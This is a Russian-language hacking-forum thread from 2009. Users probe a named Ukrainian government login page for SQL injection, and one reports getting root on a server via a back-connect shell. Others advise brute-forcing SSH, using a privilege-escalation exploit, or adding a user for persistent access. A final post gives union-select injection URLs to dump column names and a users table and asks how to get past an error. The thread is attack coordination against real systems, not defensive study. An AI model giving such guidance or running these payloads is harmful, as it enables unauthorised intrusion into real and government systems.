10.12.2009, 18:24
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Значит патченное ядро.
|
|
|
10.12.2009, 19:03
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
С нами:
8728261
Репутация:
211
|
|
http://www.pz.gov.ua/login/login.php?lid=1
при подставлении кавычки в поле логин...
шибка во время выполнения запроса: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
а так
http://www.pz.gov.ua/login/login.php?lid=-1
ORA-00936: missing expression
это как понимать? один сайт работает на разных БД?
|
|
|
|
10.12.2009, 19:26
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами:
9100556
Репутация:
912
|
|
Сообщение от 547
http://www.pz.gov.ua/login/login.php?lid=1
при подставлении кавычки в поле логин...
шибка во время выполнения запроса: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
а так
http://www.pz.gov.ua/login/login.php?lid=-1
ORA-00936: missing expression
это как понимать? один сайт работает на разных БД?
_http://forum.antichat.ru/showpost.php?p=1725903&postcount=11344
|
|
|
|
10.12.2009, 20:05
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
С нами:
8728261
Репутация:
211
|
|
Сообщение от .:[melkiy]:.
_http://forum.antichat.ru/showpost.php?p=1725903&postcount=11344
ну там еще и мускуль...
|
|
|
|
10.12.2009, 21:02
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами:
9100556
Репутация:
912
|
|
Получил рута через бэк-коннект. Как теперь сделать чтобы смог подключиться через putty? Мб расшифровать хэш рута с /etc/shadow? Есть еще какие-то способы?
|
|
|
|
10.12.2009, 21:33
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
есть, сбрутить пароль SSH или применть сплойт для поднятия прав до рута
Последний раз редактировалось Pashkela; 10.12.2009 в 21:37..
|
|
|
|
10.12.2009, 21:34
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
С нами:
10339586
Репутация:
1396
|
|
мб добавить юзера?
ззы
Pashkela,
есть, сбрутить пароль SSH или применть сплойт для поднятия прав до рута
а по-моему :
Получил рута через бэк-коннект...
уже как бы подразумевает,что у чела рут..не? |
|
|
|
10.12.2009, 21:37
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами:
9100556
Репутация:
912
|
|
Сообщение от Pashkela
есть, сбрутить пароль SSH или применть сплойт для поднятия прав до рута
Я написал что права рута уже есть! Только через cmd, нада сделать чтобы смог подключится через пути (ssh)
Сообщение от $n@ke
мб добавить юзера?
как?
|
|
|
|
10.12.2009, 21:38
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
2 $n@ke:
да, я как всегда невмнимателен
|
|
|
|
10.12.2009, 21:41
|
|
Новичок
Регистрация: 05.10.2008
Сообщений: 8
С нами:
9262575
Репутация:
0
|
|
Здравствуйте!
Товарищи нужна ваша помощь.
В общем проблема заключается в следующем:
Нашел одну уязвимость на сайте в общем определил базу, колонки.
Сделал запрос след. вида:
http://site.php/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_co ncat(column_name),14,15,16,17,18,19,20,21,22,23,24 ,25+from+information_schema.columns+where+table_na me=0x7573657273--
колонки видно все норм
далее
http://site.php/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,user,14, 15,16,17,18,19,20,21,22,23,24,25+from+users--
он выдает ошибку след. содержания:
Query failed: Table 'site.users' doesn't exist
походу тут стоят ограничения.
как обойти подскажите плиз, какой надо сформировать запрос?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?1747051){kind=avatar}
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?1747302){kind=avatar}
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?1747418){kind=avatar}
Похожие темы
Комбинированный вид
